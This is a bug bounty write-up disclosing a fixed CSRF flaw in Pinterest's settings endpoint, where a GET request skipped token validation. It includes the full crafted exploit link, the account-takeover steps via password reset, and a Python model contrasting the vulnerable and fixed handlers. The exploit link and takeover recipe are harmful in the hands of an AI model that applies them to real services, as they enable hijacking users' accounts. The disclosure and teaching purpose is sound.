Pinterest runs a public bug bounty program on Bugcrowd. The Pinterest security team has fixed the vulnerability and has allowed me to publish this blog.
This was a simple CSRF vulnerability that could modify any user’s email ID and username, leading to account takeover. The vulnerability was severe because Pinterest has 250 million monthly active users.
Note: All accounts used to demonstrate the vulnerability are test accounts.
What was the bug?
While browsing through “https://www.pinterest.com”, I observed that the CSRF token is passed in the HTTP header “X-CSRFToken”. To validate the implementation of the CSRF token I used the request below, which is used to modify the user settings:
POST /_ngjs/resource/UserSettingsResource/update/ HTTP/1.1
Host: www.pinterest.com
Content-Type: application/x-www-form-urlencoded
X-CSRFToken: <CSRF Token>
……..
……..
<POST Parameters>
1) First, I removed the “X-CSRFToken” header from the above POST request and forwarded it. This gave an error in the response saying “/resource/UserSettingsResource/update/ didn’t finish after 8 seconds”, which meant that the CSRF token was being validated.
2) Then I changed the POST request to a GET and forwarded the request (again without the “X-CSRFToken” header). This time I got “200 OK” as the response.
The CSRF token was not being validated when the POST request was converted to a GET.
Note: This was an application-wide CSRF, as most of the endpoints in the application were vulnerable to this.
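Added example, not Pinterest’s code: a minimal Python model of the handler behaviour described above, contrasting a token check that runs only for POST with one that refuses safe methods and requires the token on every other method. It assumes a hypothetical session token, a shortened version of the crafted link carrying only the email and username fields, and a hypothetical parse_request helper standing in for the framework.

```python
import hmac
import json
from urllib.parse import parse_qs, urlsplit

# Constructed sample values (not Pinterest's): the session's real token and a
# shortened version of the crafted link, carrying only the two fields that matter.
SESSION_TOKEN = "session-csrf-token-123"
CRAFTED_LINK = ("https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/"
                "?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22email%22%3A"
                "%22anytestemail%40user.com%22%2C%22username%22%3A%22dummyuser%22%7D%7D")
UPDATE_PATH = "/_ngjs/resource/UserSettingsResource/update/"

def parse_request(method, url, headers=None, body=""):
    """Hypothetical framework glue: merge query-string and form-body parameters
    and decode the JSON 'data' parameter the update endpoint expects."""
    parts = urlsplit(url)
    params = {**parse_qs(parts.query), **parse_qs(body)}
    data = json.loads(params["data"][0]) if "data" in params else None
    return {"method": method, "path": parts.path, "headers": headers or {}, "data": data}

def csrf_ok(req, session_token):
    """Constant-time comparison of the X-CSRFToken header with the session's token."""
    token = req["headers"].get("X-CSRFToken", "")
    return bool(token) and hmac.compare_digest(token, session_token)

def apply_update(req, account):
    opts = req["data"]["options"]
    return dict(account, email=opts["email"], username=opts["username"])

def vulnerable_update(req, session_token, account):
    """The bug class from the write-up: the token is validated only for POST,
    so the same handler reached via GET mutates state with no token at all."""
    if req["path"] != UPDATE_PATH:
        return 404, account
    if req["method"] == "POST" and not csrf_ok(req, session_token):
        return 403, account
    return 200, apply_update(req, account)      # GET falls through to here

def fixed_update(req, session_token, account):
    """Safe methods never reach the mutation; every other method must carry
    a valid token, so changing the method no longer bypasses the check."""
    if req["path"] != UPDATE_PATH:
        return 404, account
    if req["method"] in ("GET", "HEAD", "OPTIONS"):
        return 405, account
    if not csrf_ok(req, session_token):
        return 403, account
    return 200, apply_update(req, account)
```

Running parse_request("GET", CRAFTED_LINK) through vulnerable_update returns 200 with the email and username replaced, while fixed_update returns 405 and leaves the account untouched.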
Account Takeover:
As this is a GET-based CSRF, all we need to do is craft a link as shown below (this link can be crafted using the “change request method” option in Burp Suite):
“https://www.pinterest.com/_ngjs/resource/UserSettingsResource/update/?source_url=%2Fsettings%2F&data=%7B%22options%22%3A%7B%22impressum_url%22%3Anull%2C%22last_name%22%3A%22dummy%22%2C%22custom_gender%22%3Anull%2C%22locale%22%3A%22en-US%22%2C%22has_password%22%3Atrue%2C%22email_settings%22%3A%22Everything+%28except+emails+you%27ve+turned+off%29%22%2C%22news_settings%22%3A%22Activity+from+other+people+on+Pinterest%22%2C%22id%22%3A%22%22%2C%22is_write_banned%22%3Afalse%2C%22first_name%22%3A%22dummyuser%22%2C%22push_settings%22%3A%22Everything+%28except+push+you%27ve+turned+off%29%22%2C%22personalize_from_offsite_browsing%22%3Atrue%2C%22facebook_timeline_enabled%22%3Afalse%2C%22email_changing_to%22%3Anull%2C%22personalize_nux_from_offsite_browsing%22%3Afalse%2C%22is_tastemaker%22%3Afalse%2C%22type%22%3A%22user_settings%22%2C%22email%22%3A%22anytestemail%40user.com%22%2C%22website_url%22%3A%22%22%2C%22location%22%3A%22%22%2C%22username%22%3A%22dummyuser%22%2C%22pfy_preference%22%3Atrue%2C%22facebook_publish_stream_enabled%22%3Afalse%2C%22email_bounced%22%3Afalse%2C%22is_partner%22%3Anull%2C%22ads_customize_from_conversion%22%3Atrue%2C%22additional_website_urls%22%3A%5B%5D%2C%22about%22%3A%22test%22%2C%22gender%22%3A%22male%22%2C%22age%22%3Anull%2C%22exclude_from_search%22%3Afalse%2C%22birthdate%22%3Anull%2C%22show_impressum%22%3Afalse%2C%22email_biz_settings%22%3A%22Everything+%28includes+announcements%2C+expert+tips%2C+creative+ideas%2C+and+more%29%22%2C%22country%22%3A%22IN%22%2C%22hide_from_news%22%3Afalse%2C%22collaborative_boards%22%3A%5B%5D%7D%2C%22context%22%3A%7B%7D%7D”
When a user clicks on the above link, their username and email ID change to “dummyuser” and “anytestemail@user.com” respectively (the email ID “anytestemail@user.com” is under my control and has been used in the crafted link).
After the successful CSRF attack, I browsed to the following link to reset the password:
“https://www.pinterest.com/password/reset/”
I entered the email ID as “anytestemail@user.com” and received an email from Pinterest with a password reset link (“anytestemail@user.com” is at this point the email ID of the user who clicked on the crafted link, since the CSRF vulnerability modified it). I used this password reset link to reset the password and log in to the user’s account.
I would like to thank the Pinterest Security Team for fixing the vulnerability quickly and allowing me to disclose this submission and the Bugcrowd team for properly handling and coordinating the report.
Timeline:
1st December 2018: Vulnerability Reported
7th December 2018: Triaged
7th December 2018: Pinterest rewarded a bounty of $2400
7th December 2018: Vulnerability Fixed